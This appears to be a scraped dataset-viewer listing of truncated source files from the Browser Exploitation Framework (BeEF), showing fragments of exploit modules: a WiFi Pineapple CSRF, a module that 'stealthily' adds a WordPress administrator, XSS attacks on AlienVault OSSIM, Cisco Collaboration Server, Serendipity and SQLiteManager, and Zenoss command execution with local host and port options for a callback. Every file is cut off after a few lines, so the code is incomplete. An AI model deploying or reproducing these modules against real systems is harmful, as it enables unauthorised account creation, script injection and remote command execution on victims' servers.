# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Wifi_pineapple_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' ... |
JavaScript | beef/modules/exploits/wordpress_add_admin/command.js | //
// Copyright (c) 2015 Daniel Reece - @HBRN8
//
beef.execute(function() {
function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.se... |
YAML | beef/modules/exploits/wordpress_add_admin/config.yaml | #
# Copyright (c) 2015 Daniel Reece - @HBRN8
#
beef:
module:
Wordpress_add_admin:
enable: true
category: "Persistence"
name: "Wordpress Add Administrator"
description: "This module stealthily adds a Wordpress administrator account"
authors: ["hibu... |
Ruby | beef/modules/exploits/wordpress_add_admin/module.rb | #
# Copyright (c) 2015 Daniel Reece - @HBRN8
class Wordpress_add_admin < BeEF::Core::Command
def self.options
[{ 'name' => 'user', 'ui_label' => 'Username:', 'value' => 'beef' },
{ 'name' => 'pass', 'ui_label' => 'Pwd:', 'value' => [*('a'..'z'), *('0'..'9')].sample(8).join },
{ 'name' => 'email', 'ui_l... |
JavaScript | beef/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var alienvault_iframe_<%= @c... |
YAML | beef/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
alienvault_ossim_3_1_xss:
enable: true
category: ["Exploits", "XSS"]
name: "Al... |
Ruby | beef/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Alienvault_ossim_3_1_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = c... |
JavaScript | beef/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var cisco_collaboration_ifra... |
YAML | beef/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
cisco_collaboration_server_5_xss:
enable: true
category: ["Exploits", "XSS"]
n... |
Ruby | beef/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Cisco_collaboration_server_5_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
p... |
JavaScript | beef/modules/exploits/xss/serendipity_1.6_xss/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var serendipity_iframe = bee... |
YAML | beef/modules/exploits/xss/serendipity_1.6_xss/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
serendipity_1_6_xss:
enable: true
category: ["Exploits", "XSS"]
name: "Serendi... |
Ruby | beef/modules/exploits/xss/serendipity_1.6_xss/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Serendipity_1_6_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = config... |
JavaScript | beef/modules/exploits/xss/sqlitemanager_xss/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var serendipity_iframe = bee... |
YAML | beef/modules/exploits/xss/sqlitemanager_xss/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
sqlitemanager_xss:
enable: true
category: ["Exploits", "XSS"]
name: "SQLiteMan... |
Ruby | beef/modules/exploits/xss/sqlitemanager_xss/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Sqlitemanager_xss < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
proto = configur... |
JavaScript | beef/modules/exploits/zenoss_3x_command_execution/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = ... |
YAML | beef/modules/exploits/zenoss_3x_command_execution/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/... |
Ruby | beef/modules/exploits/zenoss_3x_command_execution/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
################################################################################
# For more information see: http://itsecuritysolutions.org/... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.